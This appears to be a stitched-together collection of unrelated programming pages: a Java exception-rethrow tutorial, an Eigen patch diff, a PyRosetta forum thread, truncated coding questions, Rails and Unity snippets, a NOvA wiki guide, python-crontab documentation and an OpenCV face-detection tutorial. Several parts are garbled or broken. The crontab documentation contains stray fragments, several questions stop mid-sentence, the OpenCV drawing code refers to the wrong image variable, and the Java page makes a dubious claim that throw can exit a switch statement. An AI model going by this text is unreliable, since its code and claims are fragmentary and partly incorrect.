In this program, there are two classes, A and B. A StringIndexOutOfBoundsException is thrown in the m1() method of class A, where it is caught and handled by the catch block of that method. Now we want to propagate the exception details to class B. For this, the catch block of class A rethrows the exception into the main method of class B, where it can be handled. Hence, we can rethrow an exception from a catch block to another class where it can be handled. Let's take another program where we catch an exception of one type and rethrow an exception of another type.
Program source code 7:

public class A {
    public static void main(String[] args) {
        try {
            m1();
        } catch (ArithmeticException ae) {
            System.out.println("An exception of another type is recaught: \n" + ae);
        }
    }

    static void m1() {
        try {
            int a[] = {1, 2, 3, 4, 5};
            System.out.println(a[5]); // Exception is thrown because there is no index 5.
        } catch (ArrayIndexOutOfBoundsException aie) {
            System.out.println("Array index out of range: \n" + aie);
            throw new ArithmeticException(); // Rethrow an exception of another type.
        }
    }
}

Output:
Array index out of range:
java.lang.ArrayIndexOutOfBoundsException: 5
An exception of another type is recaught:
java.lang.ArithmeticException

In this example program, the catch block catches an ArrayIndexOutOfBoundsException and rethrows an exception of another type, ArithmeticException.

Final words

The throw keyword in the Java programming language is mainly used to throw an exception manually. It takes an exception object of the Throwable class (or a subclass) as an argument. It can also be used to exit a switch statement without using a break keyword.
https://www.scientecheasy.com/2020/05/throw-keyword-in-java.html/
 #endif // include files
-#if (defined __GNUC__) && (defined __MINGW32__)
+#if (defined __GNUC__) && (defined __MINGW32__) && (__SIZEOF_POINTER__ == 8)
   #include <intrin.h>
-  //including intrin.h works around a MINGW bug
+  //including intrin.h works around a MINGW-w64 bug
   //in essence, intrin.h is included by windows.h and also declares intrinsics (just as emmintrin.h etc. below do). However,
   //intrin.h uses an extern "C" declaration, and g++ thus complains of duplicate declarations with conflicting linkage. The linkage for intrinsics
   //doesn't matter, but at that stage the compiler doesn't know; so, to avoid compile errors when windows.h is included after Eigen/Core,
-  //include intrin here.
+  //include intrin here. We do this only in 64-bit since plain mingw doesn't have intrin.h.
   #include <emmintrin.h>
   #include <xmmintrin.h>
http://eigen.tuxfamily.org/bz/attachment.cgi?id=45&amp;action=diff
Hello, I'm developing a new protocol using PyRosetta. I hoped to use Rosetta's built-in random functions (numeric::random::gaussian, for example) but couldn't find them in PyRosetta under numeric (numeric.random does not exist). Is there a way to access them? I remember reading that having a good random generator for stochastic, highly parallelized applications is quite important. Does it make sense to use Python's built-in random class in case it does not work with Rosetta's? Thank you!

You may need to explicitly import the rosetta.numeric.random module. The following works for me:

import rosetta
rosetta.init()
import rosetta.numeric.random
rosetta.numeric.random.gaussian()
0.030388865984531391
rosetta.numeric.random.gaussian()
-1.4610886425562437

If that doesn't work for you, what version of PyRosetta are you using? Both Rosetta and Python use the Mersenne Twister as a PRNG, so the quality of the random numbers should be comparable. The one concern you may have is that using multiple different random number generators in parallel is apparently sub-optimal. (See "Don't Trust Parallel Monte Carlo!" by Peter Hellekalek for details.) How big an issue this is likely depends on how intertwined the decision paths using the multiple random number generators are. (Light usage of the PyRosetta PRNG is probably not a substantial issue.)

Thank you for the explanation and the fix! That does indeed work. If I may ask, why is an explicit import needed? I thought doing

import rosetta as r
r.numeric.random.gaussian()

(which returns AttributeError: 'module' object has no attribute 'random') would be equivalent to an explicit import. Yours

It's actually a general feature of Python modules. Nested modules are not automatically loaded when a parent module is loaded. There are some modules which do load their sub-modules (for example, "import os" typically also loads os.path), but that's generally not the case. If you need the sub-module, you need to load it specifically.
Same thing with Rosetta modules. Some of the submodules are automatically loaded when you import just rosetta, but others (especially the more rarely used ones) have to be manually imported before their contents can be used. So "import rosetta" does the equivalent of "import rosetta.numeric" but it doesn't do "import rosetta.numeric.random". (Note that once imported, the module is available through all aliases, so "import rosetta as r; import rosetta.numeric.random; r.numeric.random.gaussian()" should work.) You should be able to see which modules from PyRosetta are currently loaded with the command:

print '\n'.join([m for m in sorted(sys.modules.keys()) if m.startswith("rosetta")])
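Following up on the parallel-PRNG caveat above: if you do fall back to Python's generator for a parallel run, one common mitigation is to give each worker its own seeded random.Random instance instead of sharing the module-level generator. This is a generic sketch, not PyRosetta-specific advice, and the additive seeding scheme is a simple illustration, not a statistically rigorous stream-splitting method:

```python
import random

def make_rng(worker_id, base_seed=12345):
    # Each worker gets its own Mersenne Twister stream, seeded
    # deterministically so runs are reproducible.
    return random.Random(base_seed + worker_id)

rngs = [make_rng(i) for i in range(4)]
samples = [rng.gauss(0.0, 1.0) for rng in rngs]
```

Per-worker generators also avoid lock contention on the shared module-level state.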
https://rosettacommons.org/node/3850
In HTML/CSS font size can be specified in the following fashion (deprecated, but all browsers support it): <font size="n">text</font> with n an element of {1, 2, 3, 4, 5, 6, 7}. Another possibility is the following: <span style="font-size: s;">text</span>. Is there a de facto relation between font size

We have code like:

ms = New IO.MemoryStream
bin = New System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
bin.Serialize(ms, largeGraphOfObjects)
dataToSaveToDatabase = ms.ToArray()
// put dataToSaveToDatabase in a Sql server BLOB

But the memory stream allocates a large buffer from the large object heap, and that is giving us problems. Please help me understand which of the following is better for scaling and performance.

Table: test
Columns: id <int, primary key>, doc <int>, keyword <string>

The data I want to store is a pointer to the documents containing a particular keyword.

Design 1: have a unique constraint on the keyword column and stor

I've got a CMS I'm building with a rather large form full of data to add to my database. This is where I collect my variables:

$orgName = $_POST['orgName'];
$impact = $_POST['impact'];
$headline = $_POST['headline'];
$content = $_POST['content'];
$subContent = $_POST['subContent'];
$meterText = $_POST['meterText'];
$m

I have an MVC method:

public void PushFile([FromBody]FileTransport fileData)

The class is:

public class FileTransport { public string fileData; }

In fileData I put a byte[] from a file converted into a string (UTF-8), so the string can be large. The problem is: if t

Me and a friend are currently looking at developing a game with similarities to a certain trademarked franchise. To define the units in the game, we've created an abstract class which declares the 44 variables and two methods that need to be instantiated with each instance of a unit. The next step in this game would of course be to define all the units in the game.
Unfortunately, I have 648 un

I am parsing a large html website that has over 1000 href links. I am using BeautifulSoup to get all the links, but the second time I run the program, BeautifulSoup cannot handle it (finding all the specific 'td' tags). How will I overcome this problem? Though I can load the html page with urllib, not all the links can be printed. When I use it to find one 'td' tag, it passes.

I have a large XML file that consists of relatively fixed size items, i.e.

<rootElem>
  <item>...</item>
  <item>...</item>
  <item>...</item>
</rootElem>

The item elements are relatively shallow and typically rather small (<100 KB), but there may be a lot of them (hundreds of thousands). T

I have a dataset of about 10mm hashes. I need to allow people to compare a list of hashes against those to see if they match or not. Right now we use SQL and basically scan it for each of the items in the guessing array. This worked for about 10K, but users need to check a larger set, something like 200K hashes against a dictionary of 10mm hashes. What might be a good approach?

Recently I changed to a dedicated server and I started having problems saving a large string in a jQuery ajax post. On the old server it works fine, but on this new server I get an Apache 413 error. Firebug sends this response:

Response headers
Connection close
Content-Encoding gzip
Content-Length 331
Content-Type text/html; charset=iso
http://bighow.org/tags/Large/1
I was browsing the source code of this gem and I found a use of content_tag that confuses me a lot.

def render(view)
  view.content_tag(name, attributes[:content], attributes.except(:content))
end

Most commonly, content_tag is called in the context of a view - so, you don't need to call view.content_tag because the view knows how to respond to content_tag (and simply calling content_tag is the same as calling self.content_tag). The render method that you're showing exists within the class MetaTag, which inherits from Tag. Tag is a plain old Ruby object (PORO), so it doesn't know how to respond to content_tag. But, as you can see, the render method takes a view as an argument. And, naturally, the view object knows how to respond to content_tag. So, calling view.content_tag is the way that MetaTag is able to render the content tag. This is pretty much an instance of the Presenter Pattern (different people use different terms). Ryan Bates has a good RailsCast on this here. To your question in the comments, Rails doesn't "know" that view is an instance of ActionView::Base. You have the responsibility of passing in an actual view instance. I tend to pass in the controller so that I have access to the view and params. Maybe something like this:

class FooController < ApplicationController
  def foo_action
    FooPresenter.present(self)
  end
end

and...
class FooPresenter
  class << self
    def present(controller)
      new(controller).present
    end
  end # class methods

  #===================================================================
  # instance methods
  #===================================================================

  def initialize(controller)
    @controller = controller
  end

  def present
    content_tag :div, data: { foo: params[:foo] }, class: 'bar'
  end

  private

  def controller() @controller end
  def view() controller.view_context end
  def params() controller.params end

  def method_missing(*args, &block)
    view.send(*args, &block)
  end
end

By including the method_missing method, I no longer have to call view.content_tag. I can just call content_tag. FooPresenter won't find the method, so it will send the call on to the view, where the method will be found and executed. Again, Ryan does a great job explaining all of this.
https://codedump.io/share/P9cqf811MQPo/1/rails-contenttag-method
The time this frame has started (Read Only). This is the time in seconds since the last level has been loaded.

//Attach this script to a GameObject
//Create a Button (Create>UI>Button) and a Text GameObject (Create>UI>Text)
//Click on the GameObject and attach the Button and Text in the fields in the Inspector
//This script outputs the time since the last level load. It also allows you to load a new Scene by pressing the Button. When this new Scene loads, the time resets and updates.

using UnityEngine;
using UnityEngine.SceneManagement;
using UnityEngine.UI;

public class TimeSinceLevelLoad : MonoBehaviour
{
    public Button m_MyButton;
    public Text m_MyText;

    void Awake()
    {
        //Don't destroy the GameObject when loading a new Scene
        DontDestroyOnLoad(gameObject);
        //Make sure the Canvas isn't deleted so the UI stays on the Scene load
        DontDestroyOnLoad(GameObject.Find("Canvas"));

        if (m_MyButton != null)
            //Add a listener to call the LoadSceneButton function when the Button is clicked
            m_MyButton.onClick.AddListener(LoadSceneButton);
    }

    void Update()
    {
        //Output the time since the level loaded to the screen using this label
        m_MyText.text = "Time Since Loaded : " + Time.timeSinceLevelLoad;
    }

    void LoadSceneButton()
    {
        //Press this Button to load another Scene
        //Load the Scene named "Scene2"
        SceneManager.LoadScene("Scene2");
    }
}
https://docs.unity3d.com/kr/2019.3/ScriptReference/Time-timeSinceLevelLoad.html
Novaart » The NOvA Offline Workbook » Christopher Backhouse, 04/05/2016 05:48. Comments and feedback are welcome. The _if you see something, say something_ policy applies here, it's a wiki!

h2. Goal

Our goal is to add a variable that stores, for example, the number of bad channels in a subrun. For illustration purposes, we have decided to include that variable in the header branch.

!add-var.png!

h2. Step 1: Download packages

Work under a development release (if you think you will be committing your work to the repository) or in any stable tag (if you do not know yet). After setting up your environment with

<pre>
srt setup -a
</pre>

download the following packages (for this example):

* StandardRecord
* CAFMaker

using the command

<pre>
addpkg_svn -h <pkg name>
</pre>

h2. Step 2: Define the object

Note: In this example, this step is equivalent to step 7 in the pdf version (docdb-12273). Since we want to put our variable into the header branch (hdr), we open StandardRecord/SRHeader.h and add the type, the name, and a brief description of it at the end of the file:

<pre>
<code class="cpp">
namespace caf {
  class SRNumuSandbox{
  public:
    ...
    unsigned int nbadchan; ///< Number of bad channels in a subrun. This is our new variable!
    void setDefault();
  };
}
</code>
</pre>

h2. Step 3: Update class version

Open StandardRecord/classes_def.xml and update the class version index from _i_ to _i+1_:

<pre>
<lcgdict>
  <class name="caf::SRHeader" ClassVersion="22" >
</lcgdict>
</pre>

becomes

<pre>
<lcgdict>
  <class name="caf::SRHeader" ClassVersion="23" >
</lcgdict>
</pre>

h2. Step 4: Compile

After saving the previous changes, go to your $SRT_PRIVATE_CONTEXT area and compile the StandardRecord package:

<pre>
<novagpvm08.fnal.gov> make StandardRecord.all
</pre>

You will get an error message like this (NOTE: that was the case at the time of writing the pdf version of this tutorial):

...
<pre>
class caf::SRLid
<**compiling**> StandardRecord_dict.cc
<**linking**> libStandardRecord_dict.so
<**checking class version numbers**> libStandardRecord_dict.so
INFO: adding version info for class 'caf::SRHeader': <version ClassVersion="23" checksum="2291111394"/>
WARNING: classes_def.xml files have been updated: rebuild dictionaries.
make[1]: *** [/nova/app/users/jasq/devel/lib/Linux2.6-GCC-maxopt/libStandardRecord_dict.so] Error 2
make: *** [StandardRecord.all] Error 2
</pre>

h2. Step 5: Compile again

The solution to the previous error is simply to compile again:

<pre>
<novagpvm08.fnal.gov> make StandardRecord.all
<**compiling**> StandardRecord_map.cc
<**linking**> libStandardRecord_map.so
<novagpvm08.fnal.gov>
</pre>

h2. Step 6: Add into CAFMaker

Open CAFMaker/CAFMaker_module.cc, but be aware that this is going to be a huge file. The trick is to search for keywords (i.e. header). This is one of the most important parts, since it is here that you define the instructions to put your variable into the CAF framework.

<pre>
<code class="cpp">
...
//#######################################################
// Fill header.
// Get metadata information for header
unsigned int run = evt.run();
unsigned int nbadchan = bc->NBadInSubRun(subrun); // This is our new variable!

rec.hdr = SRHeader();
rec.hdr.run = run;
rec.hdr.nbadchan = nbadchan; // This is our new variable!
</code>
</pre>

After this, save it. Compile:

<pre>
make CAFMaker.all
</pre>

You should not get any error messages.

h2. Step 7: Almost done

In order to check that your variable produces reasonable values, let's test it. You will need two things:

* An input ART root file (i.e. reco/pid)
* A .fcl file (for example, CAFMaker/cafmakerjob.fcl or the one in the job/ folder)

h2. Step 8: Produce the CAF

In the area you have been working in, you can produce the CAF by doing

<pre>
nova -c job/cafmakerjob.fcl -n 2 <input ART root file>
</pre>

and after that, open it:

<pre>
cafe <file_name>
</pre>

!result.png!

Your variable has been added and filled!

h2. Making it real

Thinking your variable is ready for submission?
Send an email to nova_offline or contact any group convener before committing.

h2. References/Documentation

The following material was consulted when preparing this tutorial:

* "Description of variables in CAFs from the NOvA art-wiki":
* "Introduction to the Common Analysis Files by Dominick Rocco":
* "Introduction to CAFAna framework by Gavin Davies":
https://cdcvs.fnal.gov/redmine/projects/novaart/wiki/How_to_put_a_variable_into_CAF/8/annotate
Python Crontab API

Project description

Bug Reports and Development

Please report any problems to the github issues tracker. Please use Git and push patches to the github.

Reading

Note: Several users have reported their new crontabs not saving automatically. At this point you MUST use write() if you want your edits to be saved out. See below for full details on the use of the write function.

Getting access to a crontab can happen in five ways; three system methods will work only on Unix and require you to have the right permissions:

from crontab import CronTab
empty """)

Special per-command user flag for vixie cron format (new in 1.9):

system_cron = CronTab(tabfile='/etc/crontab', user=False)
job = system_cron[0]
job.user != None
system_cron.new(command='new_command', user='root')

Creating a new job is as simple as:

job = cron.new(command='/usr/bin/echo')

And setting the job's time restrictions:

job.minute.during(5, 50).every(5)
job.hour.every(4)
job.day.on(4, 5, 6)
job.dow.on('SUN')
job.dow.on('SUN', 'FRI')
* * *')

Setting the slice to a python date object:

job.setall(time(10, 2))
job.setall(date(2000, 4, 2))
job.setall(datetime(2000, 4, 2, 10, 2))

Run a job's command.
Running the job here will not affect its existing schedule with another crontab process:

job_standard_output = job.run()

Creating a job with a comment:

job = cron.new(command='/foo/bar', comment='SomeID')

Get the comment or command for a job:

command = job.command
comment = job.comment

Modify the comment or command on a job:

job.set_command("new_script.sh")
job.set_comment("New ID or comment here")

Disable or enable a job:

job.enable()
job.enable(False)
False == job.is_enabled()

Validity check:

True == job.is_valid()

Use a special syntax:

job.every_reboot()

Find an existing job by command sub-match or regular expression:

iter = cron.find_command('bar')  # matches foobar1
iter = cron.find_command(re.compile(r'b[ab]r$'))

Find an existing job by comment exact match or regular expression:

iter = cron.find_comment('ID or some text')
iter = cron.find_comment(re.compile(' or \w'))

Find an existing job by schedule:

iter = cron.find_time(2, 10, '2-4', '*/2', None)
iter = cron.find_time("*/2 * * * *")

Clean a job of all rules:

job.clear()

Iterate through all jobs; this includes disabled (commented out) cron jobs:

for job in cron:
    print job

Iterate through all lines; this includes all comments and empty lines:

for line in cron.lines:
    print line

Validate a cron time string:

from crontab import CronSlices
bool = CronSlices.is_valid('0/2 * * * *')

Environment Variables

Some versions of vixie cron support variables outside of the command line. These sometimes just update the environment when commands are run; the Cronie fork of vixie cron also supports CRON_TZ, which looks like a regular variable but actually changes the times the jobs are run at. Very old vixie crons don't support per-job variables, but most do.
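To make the schedule grammar above concrete, the helper below is my own plain-Python illustration (python-crontab is not required) of which minutes a cron minute field like '5-50/5' (what `job.minute.during(5,50).every(5)` produces) actually matches:

```python
def expand_minute_field(field):
    """Expand one cron minute field (e.g. '5-50/5', '*/2', '7', '0,30')
    into the sorted list of minutes (0-59) it matches."""
    minutes = set()
    for part in field.split(','):
        step = 1
        if '/' in part:
            part, step_text = part.split('/')
            step = int(step_text)
        if part == '*':
            lo, hi = 0, 59
        elif '-' in part:
            lo_text, hi_text = part.split('-')
            lo, hi = int(lo_text), int(hi_text)
        else:
            lo = hi = int(part)
        minutes.update(range(lo, hi + 1, step))
    return sorted(minutes)

print(expand_minute_field('5-50/5'))  # every 5 minutes from minute 5 through 50
print(expand_minute_field('*/15'))    # [0, 15, 30, 45]
```

This only models a single field of the five-field expression, but the same range/step/list rules apply to hours, days, months and weekdays.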
Iterate through cron-level environment variables:

for (name, value) in cron.env.items():
    print name
    print value

Create new or update cron-level environment variables:

print cron.env['SHELL']
cron.env['SHELL'] = '/bin/bash'
print cron.env

Each job can also have a list of environment variables:

for job in cron:
    job.env['NEW_VAR'] = 'A'
    print job.env

Running the Scheduler

The module is able to run a cron tab as a daemon as long as the optional croniter module is installed; each process will block and errors will be logged (new in 2.0). (Note: this functionality is new and not perfect; if you find bugs, report them!)

Running the scheduler:

tab = CronTab(tabfile='MyScripts.tab')
for result in tab.run_scheduler():
    print "This was printed to stdout by the process."

Do not do this; it won't work, because run_scheduler() returns a generator:

tab.run_scheduler()

Timeout and cadence can be changed for testing or error management:

for result in tab.run_scheduler(timeout=600):
    print "Will run jobs every 1 minute for ten minutes from now()"

for result in tab.run_scheduler(cadence=1, warp=True):
    print "Will run jobs every 1 second, counting each second as 1 minute"

All System CronTabs Functionality

The crontabs (note the plural) module can attempt to find all crontabs on the system. This works well for Linux systems with known locations for cron files and user spools. It will even extract anacron jobs, so you can get a picture of all the jobs running on your system:

from crontabs import CronTabs
for cron in CronTabs():
    print repr(cron)

All jobs can be brought together to run various searches; all jobs are added to a CronTab object which can be used as documented above:

jobs = CronTabs().all.find_command('foo')

Descriptor Functionality

If you have the cron-descriptor module installed, you will be able to ask for a translated string which describes the frequency of the job in the current locale language. This should be mostly human readable.
print(job.description(use_24hour_time_format=True))

See cron-descriptor for details of the supported languages and options.

Extra Support

- Support for vixie cron with username addition with the user flag
- Support for SunOS, AIX & HP with compatibility 'SystemV' mode
- Python 3.5.2 and Python 2.7 tested; Python 2.6 removed from support
Face Detection with Python using OpenCV

Objective

This tutorial will introduce you to the concept of object detection in Python using the OpenCV library and how you can utilize it to perform tasks like facial detection.

Pre-requisites

Hands-on knowledge of Numpy and Matplotlib is essential before working on the concepts of OpenCV. Make sure that you have the following packages installed and running before installing OpenCV:
- Python
- Numpy
- Matplotlib

Table of Contents
- OpenCV-Python
- Images as Arrays
- Images and OpenCV
- Face Detection
- Conclusion

OpenCV-Python

OpenCV-Python is the Python API of the OpenCV library; the computationally heavy routines are implemented in optimized C/C++ under the hood. This makes it a great choice for computationally intensive programs.

Installation

OpenCV-Python supports all the leading platforms like Mac OS, Linux, and Windows. It can be installed in either of the following ways:

1. From pre-built binaries and source: please refer to the detailed documentation here for Windows and here for Mac.

2. Unofficial pre-built OpenCV packages for Python, for standard desktop environments (Windows, macOS, almost any GNU/Linux distribution):
- run pip install opencv-python if you need only the main modules
- run pip install opencv-contrib-python if you need both main and contrib modules (check the extra modules listing in the OpenCV documentation)

You can either use Jupyter notebooks or any Python IDE of your choice for writing the scripts.

Images as Arrays

An image is nothing but a standard Numpy array containing pixels of data points. The more pixels in an image, the better its resolution. You can think of pixels as tiny blocks of information arranged in the form of a 2D grid, and the depth of a pixel refers to the colour information present in it. In order to be processed by a computer, an image needs to be converted into a binary form.

The number of colours an image can represent is calculated as follows:

Number of colours/shades = 2^bpp

where bpp represents bits per pixel. Naturally, the more bits per pixel, the more possible colours in the image.
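The 2^bpp relationship is easy to verify in a couple of lines, and a tiny image can already be modelled as nested lists of pixel values. This is a plain-Python sketch of my own (no OpenCV required); the toy 2×2 image is purely illustrative:

```python
# Number of representable shades doubles with every extra bit per pixel
for bpp in (1, 2, 8, 24):
    print(bpp, "bpp ->", 2 ** bpp, "shades")

# A tiny 2x2 colour "image" modelled as nested lists, the way NumPy will
# later hold it as an array of shape (rows, cols, channels)
colour_img = [[[255, 0, 0], [0, 255, 0]],
              [[0, 0, 255], [255, 255, 255]]]

rows = len(colour_img)
cols = len(colour_img[0])
channels = len(colour_img[0][0])
print("shape:", (rows, cols, channels))  # shape: (2, 2, 3)
```

Swap the nested lists for np.array(colour_img) and .shape reports the same (rows, cols, channels) triple that the tutorial inspects later.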
The following table shows the relationship more clearly. Let us now have a look at the representation of the different kinds of images:

1. Binary image

A binary image consists of 1 bit per pixel and so can have only two possible colours, i.e., black or white. Black is represented by the value 0, while 1 represents white.

2. Grayscale image

A grayscale image consists of 8 bits per pixel. This means it can have 256 different shades, where 0 represents black while 255 denotes white. For example, the image below shows a grayscale image represented in the form of an array. A grayscale image has only 1 channel, where the channel represents a dimension.

3. Coloured image

Coloured images are represented as a combination of red, green, and blue, and all other colours can be achieved by mixing these primary colours in the correct proportions. A coloured image uses 8 bits per channel (24 bits per pixel), so each channel can take 256 different values, with 0 denoting black and 255 white. Let us look at the famous coloured image of a mandrill, which has been cited in many image processing examples.

If we were to check the shape of the image above, we would get:

Shape (288, 288, 3)
288: pixel width
288: pixel height
3: colour channels

This means we can represent the above image in the form of a three-dimensional array.

Images and OpenCV

Before we jump into the process of face detection, let us learn some basics about working with OpenCV: opening images, drawing simple shapes on images, and interacting with images through callbacks. This is necessary to create a foundation before we move towards the advanced stuff.

Importing Images in OpenCV

Using Jupyter notebooks

Steps:

- Import the necessary libraries.

import numpy as np
import cv2
import matplotlib.pyplot as plt
%matplotlib inline

- Read in the image using the imread function.
We will be using the coloured 'Mandrill' image for demonstration purposes. It can be downloaded from here.

img_raw = cv2.imread('image.jpg')

- Check the type and shape of the array.

type(img_raw)
numpy.ndarray

img_raw.shape
(1300, 1950, 3)

Thus, the image gets transformed into a numpy array with a shape of 1300×1950 and 3 channels.

plt.imshow(img_raw)

What we get as an output is a bit different concerning colour. We expected a bright coloured image, but what we obtain is an image with a bluish tinge. That happens because OpenCV and matplotlib have different orders of primary colours: OpenCV reads images in BGR order, whereas matplotlib follows RGB. Thus, when we read a file through OpenCV, we read it as if it contains channels in the order blue, green, red. However, when we display the image using matplotlib, the red and blue channels appear swapped, hence the blue tinge. To avoid this issue, we will transform the channel order to what matplotlib expects using the function cvtColor:

img = cv2.cvtColor(img_raw, cv2.COLOR_BGR2RGB)
plt.imshow(img)

Using Python Scripts

Jupyter Notebooks are great for learning, but when dealing with complex images and videos, we need to display them in their own separate windows. In this section, we will be executing the code as a .py file. You can use Pycharm, Sublime or any IDE of your choice to run the script below.

import cv2

img = cv2.imread('image.jpg')
while True:
    cv2.imshow('mandrill', img)
    if cv2.waitKey(1) & 0xFF == 27:
        break
cv2.destroyAllWindows()

In this code, we have a condition, and the image will only be shown if the condition is true. Also, to break the loop, we have two conditions to fulfil:

- cv2.waitKey() is a keyboard binding function. Its argument is the time in milliseconds. The function waits the specified milliseconds for any keyboard event. If you press any key in that time, the program continues.
- The second condition pertains to the pressing of the Escape key (code 27) on the keyboard. Thus, if 1 millisecond has passed and the Escape key is pressed, the loop breaks and the program stops.
- cv2.destroyAllWindows() simply destroys all the windows we created. If you want to destroy any specific window, use the function cv2.destroyWindow(), where you pass the exact window name as the argument.

Saving images

The image can be saved in the working directory as follows:

cv2.imwrite('final_image.png', img)

where final_image.png is the name under which the image is saved.

Basic Operations on Images

In this section, we will learn how we can draw various shapes on an existing image to get a flavour of working with OpenCV.

Drawing on Images

- Begin by importing the necessary libraries.

import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import cv2

- Create a black image which will act as a template.

image_blank = np.zeros(shape=(512,512,3), dtype=np.int16)

- Display the black image.

plt.imshow(image_blank)

Function & Attributes

The generalised function for drawing shapes on images is:

cv2.shape(line, rectangle etc)(image, Pt1, Pt2, color, thickness)

There are some common arguments which are passed to the function to draw shapes on images:

- Image on which shapes are to be drawn
- Coordinates of the shape to be drawn, from Pt1 (top left) to Pt2 (bottom right)
- Color: the colour of the shape that is to be drawn, passed as a tuple, e.g. (255,0,0). For grayscale, it is the scale of brightness.
- The thickness of the geometrical figure

1. Straight Line

Drawing a straight line across an image requires specifying the points through which the line shall pass.

# Draw a diagonal red line with thickness of 5 px
line_red = cv2.line(img, (0,0), (511,511), (255,0,0), 5)
plt.imshow(line_red)

# Draw a diagonal green line with thickness of 5 px
line_green = cv2.line(img, (0,0), (511,511), (0,255,0), 5)
plt.imshow(line_green)

2.
Rectangle

For a rectangle, we need to specify the top left and the bottom right coordinates.

# Draw a blue rectangle with a thickness of 5 px
rectangle = cv2.rectangle(img, (384,0), (510,128), (0,0,255), 5)
plt.imshow(rectangle)

3. Circle

For a circle, we need to pass its centre coordinates and radius value. Let us draw a circle inside the rectangle drawn above.

img = cv2.circle(img, (447,63), 63, (0,0,255), -1)  # -1 corresponds to a filled circle
plt.imshow(img)

Writing on Images

Adding text to images is similar to drawing shapes on them, but you need to specify certain arguments before doing so:

- Text to be written
- Coordinates of the text. The text on an image begins from the bottom left direction.
- Font type and scale.
- Other attributes like colour, thickness and line type. Normally the line type used is lineType = cv2.LINE_AA.

font = cv2.FONT_HERSHEY_SIMPLEX
text = cv2.putText(img, 'OpenCV', (10,500), font, 4, (255,255,255), 2, cv2.LINE_AA)
plt.imshow(text)

These were the minor operations that can be done on images using OpenCV. Feel free to experiment with the shapes and text.

4. Face Detection

Face detection is a technique that identifies or locates human faces in digital images. A typical example of face detection occurs when we take photographs with our smartphones and they instantly detect the faces in the picture. Face detection is different from face recognition: face detection merely detects the presence of faces in an image, while facial recognition involves identifying whose face it is. In this article, we shall only be dealing with the former.

Face detection is performed using classifiers. A classifier is essentially an algorithm that decides whether a given image is positive (a face) or negative (not a face). A classifier needs to be trained on thousands of images with and without faces. Fortunately, OpenCV already has two pre-trained face detection classifiers, which can readily be used in a program.
The two classifiers are the Haar cascade classifier and the LBP (Local Binary Pattern) cascade classifier. In this article, however, we will only discuss the Haar classifier.

Haar feature-based cascade classifiers

Haar-like features are digital image features used in object recognition. They owe their name to their intuitive similarity with Haar wavelets and were used in the first real-time face detector. Paul Viola and Michael Jones, in their paper titled "Rapid Object Detection using a Boosted Cascade of Simple Features", used the idea of a Haar-feature classifier based on the Haar wavelets. This classifier is widely used for tasks like face detection in the computer vision industry.

The Haar cascade classifier employs a machine learning approach to visual object detection which is capable of processing images extremely rapidly and achieving high detection rates. This can be attributed to three main reasons:

- The Haar classifier employs the 'Integral Image' concept, which allows the features used by the detector to be computed very quickly.
- The learning algorithm is based on AdaBoost. It selects a small number of important features from a large set and gives highly efficient classifiers.
- More complex classifiers are combined to form a 'cascade' which discards any non-face regions in an image, thereby spending more computation on promising face-like regions.

Let us now try to understand how the algorithm works on images, in steps:

1. 'Haar features' extraction

After the tremendous amount of training data (in the form of images) is fed into the system, the classifier begins by extracting Haar features from each image. Haar features are a kind of convolution kernel which primarily detect whether a suitable feature is present in an image or not. Some examples of Haar features are mentioned below:

These Haar features are like windows and are placed upon images to compute a single feature. The feature is essentially a single value: the difference between the sum of the pixels under the white region and the sum under the black region.
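Neither the feature value nor the integral-image shortcut needs OpenCV to demonstrate. Below is a small pure-Python sketch of my own (a toy 4×4 image, not the actual OpenCV implementation) showing a two-rectangle feature computed with just four corner lookups per rectangle:

```python
def integral_image(img):
    """Summed-area table with an extra zero row/column, so the sum of any
    rectangle can later be read off from four corner values."""
    h, w = len(img), len(img[0])
    ii = [[0] * (w + 1) for _ in range(h + 1)]
    for y in range(h):
        for x in range(w):
            ii[y + 1][x + 1] = (img[y][x] + ii[y][x + 1]
                                + ii[y + 1][x] - ii[y][x])
    return ii

def rect_sum(ii, x, y, w, h):
    """Sum of pixels in the w-by-h rectangle with top-left (x, y):
    exactly four table lookups, regardless of rectangle size."""
    return (ii[y + h][x + w] - ii[y][x + w]
            - ii[y + h][x] + ii[y][x])

# 4x4 toy image: top half dark (think eye region), bottom half bright
img = [[1, 1, 1, 1],
       [1, 1, 1, 1],
       [9, 9, 9, 9],
       [9, 9, 9, 9]]
ii = integral_image(img)

# A two-rectangle Haar-like feature: bright (bottom) minus dark (top)
white = rect_sum(ii, 0, 2, 4, 2)   # bottom 4x2 block -> 72
black = rect_sum(ii, 0, 0, 4, 2)   # top 4x2 block -> 8
print(white - black)  # 64: a strong horizontal-edge response
```

Note how rect_sum touches only four entries of the table no matter how large the rectangle is; that constant-time lookup is exactly why Viola and Jones could afford to evaluate so many features quickly.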
The process can be easily visualized in the example below. For demonstration purposes, let's say we are only extracting two features, hence we have only two windows here. The first feature relies on the observation that the eye region is darker than the adjacent cheeks and nose region. The second feature focuses on the fact that the eyes are darker compared to the bridge of the nose. Thus, when the feature window moves over the eyes, it calculates a single value. This value is then compared to a threshold, and if it passes, the classifier concludes that there is an edge here or some positive feature.

2. 'Integral Images' concept

The algorithm proposed by Viola and Jones uses a 24×24 base window size, and that results in more than 180,000 features being calculated in this window. Imagine calculating the pixel difference for all of those features! The solution devised for this computationally intensive process is the integral image concept. With an integral image, finding the sum of all pixels under any rectangle requires only the four corner values. This means that to calculate the sum of pixels in any feature window, we do not need to sum them up individually; all we need are four lookups into the integral image. The example below will make the process transparent.

3. 'AdaBoost': to improve classifier accuracy

As pointed out above, more than 180,000 feature values result within a 24×24 window. However, not all features are useful for identifying a face. To select only the best features out of the entire chunk, a machine learning algorithm called AdaBoost is used. What it essentially does is select only those features that help to improve the classifier accuracy. It does so by constructing a strong classifier which is a linear combination of a number of weak classifiers. This reduces the number of features drastically, from around 180,000 to around 6,000.

4.
Using a 'Cascade of Classifiers'

Another way Viola and Jones ensured that the algorithm performs fast is by employing a cascade of classifiers. The cascade consists of stages, where each stage is a strong classifier. This is beneficial since it eliminates the need to apply all features at once to a window. Rather, it groups the features into separate stages, and the classifier at each stage determines whether or not the sub-window is a face. If it is not, the sub-window is discarded along with the remaining features. If the sub-window passes a stage, it continues to the next one, where the next set of features is applied. The process can be understood with the help of the diagram below.

The Viola-Jones algorithm can be visualized as follows:

Face Detection with OpenCV-Python

Now we have a fair idea about the intuition and the process behind face detection. Let us now use the OpenCV library to detect faces in an image.

Load the necessary libraries:

import numpy as np
import cv2
